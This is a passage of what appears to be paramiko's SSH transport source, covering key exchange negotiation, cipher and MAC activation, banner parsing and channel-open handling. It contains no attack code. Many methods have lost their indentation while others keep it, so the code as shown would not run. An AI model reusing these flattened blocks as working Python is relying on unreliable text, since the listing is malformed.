        # Initial digest: HASH(K || H || id || session_id), per RFC 4253 7.2.
        m = Message()
        m.add_mpint(self.K)
        m.add_bytes(self.H)
        m.add_byte(b(id))
        m.add_bytes(self.session_id)
        # Fallback to SHA1 for kex engines that fail to specify a hash
        # algorithm, or for e.g. transport tests that don't run kexinit.
        hash_algo = getattr(self.kex_engine, "hash_algo", None)
        hash_select_msg = "kex engine {} specified hash_algo {!r}".format(
            self.kex_engine.__class__.__name__, hash_algo
        )
        if hash_algo is None:
            hash_algo = sha1
            hash_select_msg += ", falling back to sha1"
        # Log the hash selection only once per transport.
        if not hasattr(self, "_logged_hash_selection"):
            self._log(DEBUG, hash_select_msg)
            setattr(self, "_logged_hash_selection", True)
        out = sofar = hash_algo(m.asbytes()).digest()
        # Extend by hashing K || H || (output so far) until we have enough
        # bytes (RFC 4253 key-stretching).
        while len(out) < nbytes:
            m = Message()
            m.add_mpint(self.K)
            m.add_bytes(self.H)
            m.add_bytes(sofar)
            digest = hash_algo(m.asbytes()).digest()
            out += digest
            sofar += digest
        return out[:nbytes]
def _get_cipher(self, name, key, iv, operation):
if name not in self._cipher_info:
raise SSHException("Unknown client cipher " + name)
else:
cipher = Cipher(
self._cipher_info[name]["class"](key),
self._cipher_info[name]["mode"](iv),
backend=default_backend(),
)
if operation is self._ENCRYPT:
return cipher.encryptor()
else:
return cipher.decryptor()
def _set_forward_agent_handler(self, handler):
if handler is None:
def default_handler(channel):
self._queue_incoming_channel(channel)
self._forward_agent_handler = default_handler
else:
self._forward_agent_handler = handler
def _set_x11_handler(self, handler):
# only called if a channel has turned on x11 forwarding
if handler is None:
# by default, use the same mechanism as accept()
def default_handler(channel, src_addr_port):
self._queue_incoming_channel(channel)
self._x11_handler = default_handler
else:
self._x11_handler = handler
def _queue_incoming_channel(self, channel):
self.lock.acquire()
try:
self.server_accepts.append(channel)
self.server_accept_cv.notify()
finally:
self.lock.release()
def _sanitize_window_size(self, window_size):
if window_size is None:
window_size = self.default_window_size
return clamp_value(MIN_WINDOW_SIZE, window_size, MAX_WINDOW_SIZE)
    def _sanitize_packet_size(self, max_packet_size):
        # None means "use this transport's default".
        if max_packet_size is None:
            max_packet_size = self.default_max_packet_size
        # NOTE(review): the upper bound here is MAX_WINDOW_SIZE, not a
        # MAX_PACKET_SIZE constant -- presumably intentional (a packet can
        # never exceed the window), but worth confirming.
        return clamp_value(MIN_PACKET_SIZE, max_packet_size, MAX_WINDOW_SIZE)
    def _ensure_authed(self, ptype, message):
        """
        Checks message type against current auth state.

        If server mode, and auth has not succeeded, and the message is of a
        post-auth type (channel open or global request) an appropriate error
        response Message is crafted and returned to caller for sending.

        Otherwise (client mode, authed, or pre-auth message) returns None.
        """
        if (
            not self.server_mode
            or ptype <= HIGHEST_USERAUTH_MESSAGE_ID
            or self.is_authenticated()
        ):
            return None
        # WELP. We must be dealing with someone trying to do non-auth things
        # without being authed. Tell them off, based on message class.
        reply = Message()
        # Global requests have no details, just failure.
        if ptype == MSG_GLOBAL_REQUEST:
            reply.add_byte(cMSG_REQUEST_FAILURE)
        # Channel opens let us reject w/ a specific type + message.
        elif ptype == MSG_CHANNEL_OPEN:
            kind = message.get_text()  # noqa
            chanid = message.get_int()
            reply.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
            reply.add_int(chanid)
            reply.add_int(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED)
            # Empty description + language tag, per RFC 4254 5.1.
            reply.add_string("")
            reply.add_string("en")
        # NOTE: Post-open channel messages do not need checking; the above will
        # reject attemps to open channels, meaning that even if a malicious
        # user tries to send a MSG_CHANNEL_REQUEST, it will simply fall under
        # the logic that handles unknown channel IDs (as the channel list will
        # be empty.)
        return reply
    def run(self):
        """
        Transport thread main loop: exchange version banners, drive key
        negotiation, then read and dispatch packets until the session dies.
        Started via `threading.Thread`; never call directly.
        """
        # (use the exposed "run" method, because if we specify a thread target
        # of a private method, threading.Thread will keep a reference to it
        # indefinitely, creating a GC cycle and not letting Transport ever be
        # GC'd. it's a bug in Thread.)

        # Hold reference to 'sys' so we can test sys.modules to detect
        # interpreter shutdown.
        self.sys = sys

        # active=True occurs before the thread is launched, to avoid a race
        _active_threads.append(self)
        tid = hex(long(id(self)) & xffffffff)
        if self.server_mode:
            self._log(DEBUG, "starting thread (server mode): {}".format(tid))
        else:
            self._log(DEBUG, "starting thread (client mode): {}".format(tid))
        try:
            try:
                self.packetizer.write_all(b(self.local_version + "\r\n"))
                self._log(
                    DEBUG,
                    "Local version/idstring: {}".format(self.local_version),
                )  # noqa
                self._check_banner()
                # The above is actually very much part of the handshake, but
                # sometimes the banner can be read but the machine is not
                # responding, for example when the remote ssh daemon is loaded
                # in to memory but we can not read from the disk/spawn a new
                # shell.
                # Make sure we can specify a timeout for the initial handshake.
                # Re-use the banner timeout for now.
                self.packetizer.start_handshake(self.handshake_timeout)
                self._send_kex_init()
                self._expect_packet(MSG_KEXINIT)
                while self.active:
                    if self.packetizer.need_rekey() and not self.in_kex:
                        self._send_kex_init()
                    try:
                        ptype, m = self.packetizer.read_message()
                    except NeedRekeyException:
                        continue
                    if ptype == MSG_IGNORE:
                        continue
                    elif ptype == MSG_DISCONNECT:
                        self._parse_disconnect(m)
                        break
                    elif ptype == MSG_DEBUG:
                        self._parse_debug(m)
                        continue
                    # During kex, only the packet type registered via
                    # _expect_packet is legal.
                    if len(self._expected_packet) > 0:
                        if ptype not in self._expected_packet:
                            raise SSHException(
                                "Expecting packet from {!r}, got {:d}".format(
                                    self._expected_packet, ptype
                                )
                            )  # noqa
                        self._expected_packet = tuple()
                        # Types 30-41 are reserved for kex engine messages.
                        if (ptype >= 30) and (ptype <= 41):
                            self.kex_engine.parse_next(ptype, m)
                            continue
                    if ptype in self._handler_table:
                        error_msg = self._ensure_authed(ptype, m)
                        if error_msg:
                            self._send_message(error_msg)
                        else:
                            self._handler_table[ptype](self, m)
                    elif ptype in self._channel_handler_table:
                        chanid = m.get_int()
                        chan = self._channels.get(chanid)
                        if chan is not None:
                            self._channel_handler_table[ptype](chan, m)
                        elif chanid in self.channels_seen:
                            self._log(
                                DEBUG,
                                "Ignoring message for dead channel {:d}".format(  # noqa
                                    chanid
                                ),
                            )
                        else:
                            self._log(
                                ERROR,
                                "Channel request for unknown channel {:d}".format(  # noqa
                                    chanid
                                ),
                            )
                            break
                    elif (
                        self.auth_handler is not None
                        and ptype in self.auth_handler._handler_table
                    ):
                        handler = self.auth_handler._handler_table[ptype]
                        handler(self.auth_handler, m)
                        if len(self._expected_packet) > 0:
                            continue
                    else:
                        # Respond with "I don't implement this particular
                        # message type" message (unless the message type was
                        # itself literally MSG_UNIMPLEMENTED, in which case, we
                        # just shut up to avoid causing a useless loop).
                        name = MSG_NAMES[ptype]
                        warning = "Oops, unhandled type {} ({!r})".format(
                            ptype, name
                        )
                        self._log(WARNING, warning)
                        if ptype != MSG_UNIMPLEMENTED:
                            msg = Message()
                            msg.add_byte(cMSG_UNIMPLEMENTED)
                            msg.add_int(m.seqno)
                            self._send_message(msg)
                    self.packetizer.complete_handshake()
            except SSHException as e:
                self._log(ERROR, "Exception: " + str(e))
                self._log(ERROR, util.tb_strings())
                self.saved_exception = e
            except EOFError as e:
                self._log(DEBUG, "EOF in transport thread")
                self.saved_exception = e
            except socket.error as e:
                if type(e.args) is tuple:
                    if e.args:
                        emsg = "{} ({:d})".format(e.args[1], e.args[0])
                    else:  # empty tuple, e.g. socket.timeout
                        emsg = str(e) or repr(e)
                else:
                    emsg = e.args
                self._log(ERROR, "Socket exception: " + emsg)
                self.saved_exception = e
            except Exception as e:
                self._log(ERROR, "Unknown exception: " + str(e))
                self._log(ERROR, util.tb_strings())
                self.saved_exception = e
            # Teardown: unlink channels, close the packetizer, and wake every
            # waiter (completion events, auth handler, accept()) so no caller
            # blocks forever on a dead transport.
            _active_threads.remove(self)
            for chan in list(self._channels.values()):
                chan._unlink()
            if self.active:
                self.active = False
                self.packetizer.close()
                if self.completion_event is not None:
                    self.completion_event.set()
                if self.auth_handler is not None:
                    self.auth_handler.abort()
                for event in self.channel_events.values():
                    event.set()
                try:
                    self.lock.acquire()
                    self.server_accept_cv.notify()
                finally:
                    self.lock.release()
            self.sock.close()
        except:
            # Don't raise spurious 'NoneType has no attribute X' errors when we
            # wake up during interpreter shutdown. Or rather -- raise
            # everything *if* sys.modules (used as a convenient sentinel)
            # appears to still exist.
            if self.sys.modules is not None:
                raise
def _log_agreement(self, which, local, remote):
# Log useful, non-duplicative line re: an agreed-upon algorithm.
# Old code implied algorithms could be asymmetrical (different for
# inbound vs outbound) so we preserve that possibility.
msg = "{} agreed: ".format(which)
if local == remote:
msg += local
else:
msg += "local={}, remote={}".format(local, remote)
self._log(DEBUG, msg)
# protocol stages
    def _negotiate_keys(self, m):
        # throws SSHException on anything unusual
        # Block user packets until the (re)key completes.
        self.clear_to_send_lock.acquire()
        try:
            self.clear_to_send.clear()
        finally:
            self.clear_to_send_lock.release()
        if self.local_kex_init is None:
            # remote side wants to renegotiate
            self._send_kex_init()
        self._parse_kex_init(m)
        self.kex_engine.start_kex()
    def _check_banner(self):
        """
        Read and validate the server's SSH version banner, storing it in
        ``self.remote_version``.  Raises `SSHException` on an unreadable,
        malformed, or incompatible banner.
        """
        # this is slow, but we only have to do it once
        for i in range(100):
            # give them 15 seconds for the first line, then just 2 seconds
            # each additional line.  (some sites have very high latency.)
            if i == 0:
                timeout = self.banner_timeout
            else:
                timeout = 2
            try:
                buf = self.packetizer.readline(timeout)
            except ProxyCommandFailure:
                raise
            except Exception as e:
                # NOTE(review): message lacks a separating space/colon before
                # the original exception text.
                raise SSHException(
                    "Error reading SSH protocol banner" + str(e)
                )
            # Servers may send arbitrary lines before the banner; only a
            # line starting "SSH-" counts (RFC 4253 4.2).
            if buf[:4] == "SSH-":
                break
            self._log(DEBUG, "Banner: " + buf)
        if buf[:4] != "SSH-":
            raise SSHException('Indecipherable protocol version "' + buf + '"')
        # save this server version string for later
        self.remote_version = buf
        self._log(DEBUG, "Remote version/idstring: {}".format(buf))
        # pull off any attached comment
        # NOTE: comment used to be stored in a variable and then...never used.
        # since 2003. ca 877cd974b8182d26fa76d566072917ea67b64e67
        i = buf.find(" ")
        if i >= 0:
            buf = buf[:i]
        # parse out version string and make sure it matches
        segs = buf.split("-", 2)
        if len(segs) < 3:
            raise SSHException("Invalid SSH banner")
        version = segs[1]
        client = segs[2]
        # "1.99" is the compatibility marker for servers that speak both
        # protocol 1 and 2 (RFC 4253 5.1).
        if version != "1.99" and version != "2.0":
            msg = "Incompatible version ({} instead of 2.0)"
            raise SSHException(msg.format(version))
        msg = "Connected (version {}, client {})".format(version, client)
        self._log(INFO, msg)
    def _send_kex_init(self):
        """
        announce to the other side that we'd like to negotiate keys, and what
        kind of key negotiation we support.

        Builds and sends a KEXINIT message advertising our preferred kex
        algorithms, host key types, ciphers, MACs, and compression methods.
        The raw payload is saved in ``self.local_kex_init`` because it is
        an input to the exchange hash computed later.
        """
        # Block user-level sends until the (re)negotiation completes.
        self.clear_to_send_lock.acquire()
        try:
            self.clear_to_send.clear()
        finally:
            self.clear_to_send_lock.release()
        self.gss_kex_used = False
        self.in_kex = True
        if self.server_mode:
            mp_required_prefix = "diffie-hellman-group-exchange-sha"
            kex_mp = [
                k
                for k in self._preferred_kex
                if k.startswith(mp_required_prefix)
            ]
            if (self._modulus_pack is None) and (len(kex_mp) > 0):
                # can't do group-exchange if we don't have a pack of potential
                # primes
                pkex = [
                    k
                    for k in self.get_security_options().kex
                    if not k.startswith(mp_required_prefix)
                ]
                self.get_security_options().kex = pkex
            # only advertise host key types we actually hold a key for
            available_server_keys = list(
                filter(
                    list(self.server_key_dict.keys()).__contains__,
                    self._preferred_keys,
                )
            )
        else:
            available_server_keys = self._preferred_keys
        m = Message()
        m.add_byte(cMSG_KEXINIT)
        m.add_bytes(os.urandom(16))  # 16-byte random cookie
        m.add_list(self._preferred_kex)
        m.add_list(available_server_keys)
        # each preference list is sent twice: once for the client-to-server
        # direction and once for server-to-client (we offer the same sets)
        m.add_list(self._preferred_ciphers)
        m.add_list(self._preferred_ciphers)
        m.add_list(self._preferred_macs)
        m.add_list(self._preferred_macs)
        m.add_list(self._preferred_compression)
        m.add_list(self._preferred_compression)
        m.add_string(bytes())  # language list (client-to-server), unused
        m.add_string(bytes())  # language list (server-to-client), unused
        m.add_boolean(False)  # no guessed kex packet follows
        m.add_int(0)  # reserved
        # save a copy for later (needed to compute a hash)
        self.local_kex_init = m.asbytes()
        self._send_message(m)
    def _parse_kex_init(self, m):
        """Parse the peer's KEXINIT and negotiate every algorithm family.

        Picks the kex engine, host key type, ciphers, MACs, and compression
        for both directions, then stashes the raw payload in
        ``self.remote_kex_init`` (an input to the exchange hash).  Raises
        `SSHException` when any family has no overlap between our
        preference lists and the peer's.
        """
        m.get_bytes(16)  # cookie, discarded
        kex_algo_list = m.get_list()
        server_key_algo_list = m.get_list()
        client_encrypt_algo_list = m.get_list()
        server_encrypt_algo_list = m.get_list()
        client_mac_algo_list = m.get_list()
        server_mac_algo_list = m.get_list()
        client_compress_algo_list = m.get_list()
        server_compress_algo_list = m.get_list()
        client_lang_list = m.get_list()
        server_lang_list = m.get_list()
        kex_follows = m.get_boolean()
        m.get_int()  # unused
        self._log(
            DEBUG,
            "kex algos:"
            + str(kex_algo_list)
            + " server key:"
            + str(server_key_algo_list)
            + " client encrypt:"
            + str(client_encrypt_algo_list)
            + " server encrypt:"
            + str(server_encrypt_algo_list)
            + " client mac:"
            + str(client_mac_algo_list)
            + " server mac:"
            + str(server_mac_algo_list)
            + " client compress:"
            + str(client_compress_algo_list)
            + " server compress:"
            + str(server_compress_algo_list)
            + " client lang:"
            + str(client_lang_list)
            + " server lang:"
            + str(server_lang_list)
            + " kex follows?"
            + str(kex_follows),
        )
        # as a server, we pick the first item in the client's list that we
        # support.
        # as a client, we pick the first item in our list that the server
        # supports.
        if self.server_mode:
            agreed_kex = list(
                filter(self._preferred_kex.__contains__, kex_algo_list)
            )
        else:
            agreed_kex = list(
                filter(kex_algo_list.__contains__, self._preferred_kex)
            )
        if len(agreed_kex) == 0:
            raise SSHException(
                "Incompatible ssh peer (no acceptable kex algorithm)"
            )  # noqa
        self.kex_engine = self._kex_info[agreed_kex[0]](self)
        self._log(DEBUG, "Kex agreed: {}".format(agreed_kex[0]))
        if self.server_mode:
            # only consider host key types we actually hold a key for
            available_server_keys = list(
                filter(
                    list(self.server_key_dict.keys()).__contains__,
                    self._preferred_keys,
                )
            )
            agreed_keys = list(
                filter(
                    available_server_keys.__contains__, server_key_algo_list
                )
            )
        else:
            agreed_keys = list(
                filter(server_key_algo_list.__contains__, self._preferred_keys)
            )
        if len(agreed_keys) == 0:
            raise SSHException(
                "Incompatible ssh peer (no acceptable host key)"
            )  # noqa
        self.host_key_type = agreed_keys[0]
        if self.server_mode and (self.get_server_key() is None):
            raise SSHException(
                "Incompatible ssh peer (can't match requested host key type)"
            )  # noqa
        self._log_agreement("HostKey", agreed_keys[0], agreed_keys[0])
        # "local" is our outbound direction and "remote" is inbound (see
        # _activate_outbound/_activate_inbound), so which of the peer's
        # client/server lists applies depends on our role.
        if self.server_mode:
            agreed_local_ciphers = list(
                filter(
                    self._preferred_ciphers.__contains__,
                    server_encrypt_algo_list,
                )
            )
            agreed_remote_ciphers = list(
                filter(
                    self._preferred_ciphers.__contains__,
                    client_encrypt_algo_list,
                )
            )
        else:
            agreed_local_ciphers = list(
                filter(
                    client_encrypt_algo_list.__contains__,
                    self._preferred_ciphers,
                )
            )
            agreed_remote_ciphers = list(
                filter(
                    server_encrypt_algo_list.__contains__,
                    self._preferred_ciphers,
                )
            )
        if len(agreed_local_ciphers) == 0 or len(agreed_remote_ciphers) == 0:
            raise SSHException(
                "Incompatible ssh server (no acceptable ciphers)"
            )  # noqa
        self.local_cipher = agreed_local_ciphers[0]
        self.remote_cipher = agreed_remote_ciphers[0]
        self._log_agreement(
            "Cipher", local=self.local_cipher, remote=self.remote_cipher
        )
        if self.server_mode:
            agreed_remote_macs = list(
                filter(self._preferred_macs.__contains__, client_mac_algo_list)
            )
            agreed_local_macs = list(
                filter(self._preferred_macs.__contains__, server_mac_algo_list)
            )
        else:
            agreed_local_macs = list(
                filter(client_mac_algo_list.__contains__, self._preferred_macs)
            )
            agreed_remote_macs = list(
                filter(server_mac_algo_list.__contains__, self._preferred_macs)
            )
        if (len(agreed_local_macs) == 0) or (len(agreed_remote_macs) == 0):
            raise SSHException("Incompatible ssh server (no acceptable macs)")
        self.local_mac = agreed_local_macs[0]
        self.remote_mac = agreed_remote_macs[0]
        self._log_agreement(
            "MAC", local=self.local_mac, remote=self.remote_mac
        )
        if self.server_mode:
            agreed_remote_compression = list(
                filter(
                    self._preferred_compression.__contains__,
                    client_compress_algo_list,
                )
            )
            agreed_local_compression = list(
                filter(
                    self._preferred_compression.__contains__,
                    server_compress_algo_list,
                )
            )
        else:
            agreed_local_compression = list(
                filter(
                    client_compress_algo_list.__contains__,
                    self._preferred_compression,
                )
            )
            agreed_remote_compression = list(
                filter(
                    server_compress_algo_list.__contains__,
                    self._preferred_compression,
                )
            )
        if (
            len(agreed_local_compression) == 0
            or len(agreed_remote_compression) == 0
        ):
            msg = "Incompatible ssh server (no acceptable compression)"
            msg += " {!r} {!r} {!r}"
            raise SSHException(
                msg.format(
                    agreed_local_compression,
                    agreed_remote_compression,
                    self._preferred_compression,
                )
            )
        self.local_compression = agreed_local_compression[0]
        self.remote_compression = agreed_remote_compression[0]
        self._log_agreement(
            "Compression",
            local=self.local_compression,
            remote=self.remote_compression,
        )
        # save for computing hash later...
        # now wait! openssh has a bug (and others might too) where there are
        # actually some extra bytes (one NUL byte in openssh's case) added to
        # the end of the packet but not parsed. turns out we need to throw
        # away those bytes because they aren't part of the hash.
        self.remote_kex_init = cMSG_KEXINIT + m.get_so_far()
    def _activate_inbound(self):
        """switch on newly negotiated encryption parameters for
        inbound traffic"""
        block_size = self._cipher_info[self.remote_cipher]["block-size"]
        # key-derivation ids mirror _activate_outbound: the server decrypts
        # with "A"/"C" (what the client encrypts with) and the client with
        # "B"/"D".
        if self.server_mode:
            IV_in = self._compute_key("A", block_size)
            key_in = self._compute_key(
                "C", self._cipher_info[self.remote_cipher]["key-size"]
            )
        else:
            IV_in = self._compute_key("B", block_size)
            key_in = self._compute_key(
                "D", self._cipher_info[self.remote_cipher]["key-size"]
            )
        engine = self._get_cipher(
            self.remote_cipher, key_in, IV_in, self._DECRYPT
        )
        mac_size = self._mac_info[self.remote_mac]["size"]
        mac_engine = self._mac_info[self.remote_mac]["class"]
        # initial mac keys are done in the hash's natural size (not the
        # potentially truncated transmission size)
        if self.server_mode:
            mac_key = self._compute_key("E", mac_engine().digest_size)
        else:
            mac_key = self._compute_key("F", mac_engine().digest_size)
        self.packetizer.set_inbound_cipher(
            engine, block_size, mac_engine, mac_size, mac_key
        )
        compress_in = self._compression_info[self.remote_compression][1]
        # zlib@openssh.com defers compression until after authentication
        # (see _auth_trigger)
        if compress_in is not None and (
            self.remote_compression != "zlib@openssh.com" or self.authenticated
        ):
            self._log(DEBUG, "Switching on inbound compression ...")
            self.packetizer.set_inbound_compressor(compress_in())
    def _activate_outbound(self):
        """switch on newly negotiated encryption parameters for
        outbound traffic"""
        m = Message()
        m.add_byte(cMSG_NEWKEYS)
        # NEWKEYS is sent before the packetizer is switched over, so it
        # still goes out under the current (old) parameters.
        self._send_message(m)
        block_size = self._cipher_info[self.local_cipher]["block-size"]
        # mirror of _activate_inbound: the server encrypts with "B"/"D",
        # the client with "A"/"C".
        if self.server_mode:
            IV_out = self._compute_key("B", block_size)
            key_out = self._compute_key(
                "D", self._cipher_info[self.local_cipher]["key-size"]
            )
        else:
            IV_out = self._compute_key("A", block_size)
            key_out = self._compute_key(
                "C", self._cipher_info[self.local_cipher]["key-size"]
            )
        engine = self._get_cipher(
            self.local_cipher, key_out, IV_out, self._ENCRYPT
        )
        mac_size = self._mac_info[self.local_mac]["size"]
        mac_engine = self._mac_info[self.local_mac]["class"]
        # initial mac keys are done in the hash's natural size (not the
        # potentially truncated transmission size)
        if self.server_mode:
            mac_key = self._compute_key("F", mac_engine().digest_size)
        else:
            mac_key = self._compute_key("E", mac_engine().digest_size)
        sdctr = self.local_cipher.endswith("-ctr")
        self.packetizer.set_outbound_cipher(
            engine, block_size, mac_engine, mac_size, mac_key, sdctr
        )
        compress_out = self._compression_info[self.local_compression][0]
        # zlib@openssh.com defers compression until after authentication
        # (see _auth_trigger)
        if compress_out is not None and (
            self.local_compression != "zlib@openssh.com" or self.authenticated
        ):
            self._log(DEBUG, "Switching on outbound compression ...")
            self.packetizer.set_outbound_compressor(compress_out())
        if not self.packetizer.need_rekey():
            self.in_kex = False
        # we always expect to receive NEWKEYS now
        self._expect_packet(MSG_NEWKEYS)
def _auth_trigger(self):
self.authenticated = True
# delayed initiation of compression
if self.local_compression == "zlib@openssh.com":
compress_out = self._compression_info[self.local_compression][0]
self._log(DEBUG, "Switching on outbound compression ...")
self.packetizer.set_outbound_compressor(compress_out())
if self.remote_compression == "zlib@openssh.com":
compress_in = self._compression_info[self.remote_compression][1]
self._log(DEBUG, "Switching on inbound compression ...")
self.packetizer.set_inbound_compressor(compress_in())
def _parse_newkeys(self, m):
self._log(DEBUG, "Switch to new keys ...")
self._activate_inbound()
# can also free a bunch of stuff here
self.local_kex_init = self.remote_kex_init = None
self.K = None
self.kex_engine = None
if self.server_mode and (self.auth_handler is None):
# create auth handler for server mode
self.auth_handler = AuthHandler(self)
if not self.initial_kex_done:
# this was the first key exchange
self.initial_kex_done = True
# send an event?
if self.completion_event is not None:
self.completion_event.set()
# it's now okay to send data again (if this was a re-key)
if not self.packetizer.need_rekey():
self.in_kex = False
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.set()
finally:
self.clear_to_send_lock.release()
return
def _parse_disconnect(self, m):
code = m.get_int()
desc = m.get_text()
self._log(INFO, "Disconnect (code {:d}): {}".format(code, desc))
def _parse_global_request(self, m):
kind = m.get_text()
self._log(DEBUG, 'Received global request "{}"'.format(kind))
want_reply = m.get_boolean()
if not self.server_mode:
self._log(
DEBUG,
'Rejecting "{}" global request from server.'.format(kind),
)
ok = False
elif kind == "tcpip-forward":
address = m.get_text()
port = m.get_int()
ok = self.server_object.check_port_forward_request(address, port)
if ok:
ok = (ok,)
elif kind == "cancel-tcpip-forward":
address = m.get_text()
port = m.get_int()
self.server_object.cancel_port_forward_request(address, port)
ok = True
else:
ok = self.server_object.check_global_request(kind, m)
extra = ()
if type(ok) is tuple:
extra = ok
ok = True
if want_reply:
msg = Message()
if ok:
msg.add_byte(cMSG_REQUEST_SUCCESS)
msg.add(*extra)
else:
msg.add_byte(cMSG_REQUEST_FAILURE)
self._send_message(msg)
def _parse_request_success(self, m):
self._log(DEBUG, "Global request successful.")
self.global_response = m
if self.completion_event is not None:
self.completion_event.set()
def _parse_request_failure(self, m):
self._log(DEBUG, "Global request denied.")
self.global_response = None
if self.completion_event is not None:
self.completion_event.set()
def _parse_channel_open_success(self, m):
chanid = m.get_int()
server_chanid = m.get_int()
server_window_size = m.get_int()
server_max_packet_size = m.get_int()
chan = self._channels.get(chanid)
if chan is None:
self._log(WARNING, "Success for unrequested channel! [??]")
return
self.lock.acquire()
try:
chan._set_remote_channel(
server_chanid, server_window_size, server_max_packet_size
)
self._log(DEBUG, "Secsh channel {:d} opened.".format(chanid))
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open_failure(self, m):
chanid = m.get_int()
reason = m.get_int()
reason_str = m.get_text()
m.get_text() # ignored language
reason_text = CONNECTION_FAILED_CODE.get(reason, "(unknown code)")
self._log(
ERROR,
"Secsh channel {:d} open FAILED: {}: {}".format(
chanid, reason_str, reason_text
),
)
self.lock.acquire()
try:
self.saved_exception = ChannelException(reason, reason_text)
if chanid in self.channel_events:
self._channels.delete(chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
    def _parse_channel_open(self, m):
        """Handle a peer's request to open a new channel.

        Client mode only honors server-initiated kinds that a handler was
        registered for (agent forwarding, x11, forwarded-tcpip); anything
        else is rejected.  Server mode asks ``server_object`` for
        permission.  On success a `.Channel` is wired up, a confirmation
        is sent, and the channel is handed to the matching handler (or
        queued via ``_queue_incoming_channel``).
        """
        kind = m.get_text()
        chanid = m.get_int()  # the PEER's id for this channel
        initial_window_size = m.get_int()
        max_packet_size = m.get_int()
        reject = False
        if (
            kind == "auth-agent@openssh.com"
            and self._forward_agent_handler is not None
        ):
            self._log(DEBUG, "Incoming forward agent connection")
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
        elif (kind == "x11") and (self._x11_handler is not None):
            origin_addr = m.get_text()
            origin_port = m.get_int()
            self._log(
                DEBUG,
                "Incoming x11 connection from {}:{:d}".format(
                    origin_addr, origin_port
                ),
            )
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
        elif (kind == "forwarded-tcpip") and (self._tcp_handler is not None):
            server_addr = m.get_text()
            server_port = m.get_int()
            origin_addr = m.get_text()
            origin_port = m.get_int()
            self._log(
                DEBUG,
                "Incoming tcp forwarded connection from {}:{:d}".format(
                    origin_addr, origin_port
                ),
            )
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
        elif not self.server_mode:
            # client mode with no handler registered for this kind
            self._log(
                DEBUG,
                'Rejecting "{}" channel request from server.'.format(kind),
            )
            reject = True
            reason = OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
        else:
            # server mode: consult the ServerInterface
            self.lock.acquire()
            try:
                my_chanid = self._next_channel()
            finally:
                self.lock.release()
            if kind == "direct-tcpip":
                # handle direct-tcpip requests coming from the client
                dest_addr = m.get_text()
                dest_port = m.get_int()
                origin_addr = m.get_text()
                origin_port = m.get_int()
                reason = self.server_object.check_channel_direct_tcpip_request(
                    my_chanid,
                    (origin_addr, origin_port),
                    (dest_addr, dest_port),
                )
            else:
                reason = self.server_object.check_channel_request(
                    kind, my_chanid
                )
            if reason != OPEN_SUCCEEDED:
                self._log(
                    DEBUG,
                    'Rejecting "{}" channel request from client.'.format(kind),
                )
                reject = True
        if reject:
            msg = Message()
            msg.add_byte(cMSG_CHANNEL_OPEN_FAILURE)
            msg.add_int(chanid)
            msg.add_int(reason)
            msg.add_string("")
            msg.add_string("en")
            self._send_message(msg)
            return
        # accepted: register the channel and link it to the peer's side
        chan = Channel(my_chanid)
        self.lock.acquire()
        try:
            self._channels.put(my_chanid, chan)
            self.channels_seen[my_chanid] = True
            chan._set_transport(self)
            chan._set_window(
                self.default_window_size, self.default_max_packet_size
            )
            chan._set_remote_channel(
                chanid, initial_window_size, max_packet_size
            )
        finally:
            self.lock.release()
        m = Message()
        m.add_byte(cMSG_CHANNEL_OPEN_SUCCESS)
        m.add_int(chanid)
        m.add_int(my_chanid)
        m.add_int(self.default_window_size)
        m.add_int(self.default_max_packet_size)
        self._send_message(m)
        self._log(
            DEBUG, "Secsh channel {:d} ({}) opened.".format(my_chanid, kind)
        )
        # hand the new channel to the registered handler for its kind, or
        # queue it for later pickup via _queue_incoming_channel
        if kind == "auth-agent@openssh.com":
            self._forward_agent_handler(chan)
        elif kind == "x11":
            self._x11_handler(chan, (origin_addr, origin_port))
        elif kind == "forwarded-tcpip":
            chan.origin_addr = (origin_addr, origin_port)
            self._tcp_handler(
                chan, (origin_addr, origin_port), (server_addr, server_port)
            )
        else:
            self._queue_incoming_channel(chan)
    def _parse_debug(self, m):
        """Log an incoming SSH debug message; display/language fields are
        read off the wire but ignored."""
        m.get_boolean()  # always_display
        msg = m.get_string()
        m.get_string()  # language
        # util.safe_string presumably sanitizes the raw bytes for logging
        # -- implementation not shown here
        self._log(DEBUG, "Debug msg: {}".format(util.safe_string(msg)))
def _get_subsystem_handler(self, name):
try:
self.lock.acquire()
if name not in self.subsystem_table:
return None, [], {}
return self.subsystem_table[name]
finally:
self.lock.release()
_handler_table = {
MSG_NEWKEYS: _parse_newkeys,
MSG_GLOBAL_REQUEST: _parse_global_request,
MSG_REQUEST_SUCCESS: _parse_request_success,
MSG_REQUEST_FAILURE: _parse_request_failure,
MSG_CHANNEL_OPEN_SUCCESS: _parse_channel_open_success,
MSG_CHANNEL_OPEN_FAILURE: _parse_channel_open_failure,
MSG_CHANNEL_OPEN: _parse_channel_open,
MSG_KEXINIT: _negotiate_keys,
}
_channel_handler_table = {
MSG_CHANNEL_SUCCESS: Channel._request_success,
MSG_CHANNEL_FAILURE: Channel._request_failed,
MSG_CHANNEL_DATA: Channel._feed,
MSG_CHANNEL_EXTENDED_DATA: Channel._feed_extended,
MSG_CHANNEL_WINDOW_ADJUST: Channel._window_adjust,
MSG_CHANNEL_REQUEST: Channel._handle_request,
MSG_CHANNEL_EOF: Channel._handle_eof,
MSG_CHANNEL_CLOSE: Channel._handle_close,
}
class SecurityOptions(object):
    """
    Simple object containing the security preferences of an ssh transport.
    These are tuples of acceptable ciphers, digests, key types, and key
    exchange algorithms, listed in order of preference.

    Changing the contents and/or order of these fields affects the
    underlying `.Transport` (but only if you change them before starting
    the session).  Trying to add an algorithm that paramiko doesn't
    recognize raises ``ValueError``; assigning anything besides a tuple or
    list raises ``TypeError``.
    """

    __slots__ = "_transport"

    def __init__(self, transport):
        self._transport = transport

    def __repr__(self):
        """Return a debugging representation naming the wrapped transport."""
        return "<paramiko.SecurityOptions for {!r}>".format(self._transport)

    def _set(self, name, orig, x):
        # Normalize lists to tuples; anything else non-tuple is an error.
        if type(x) is list:
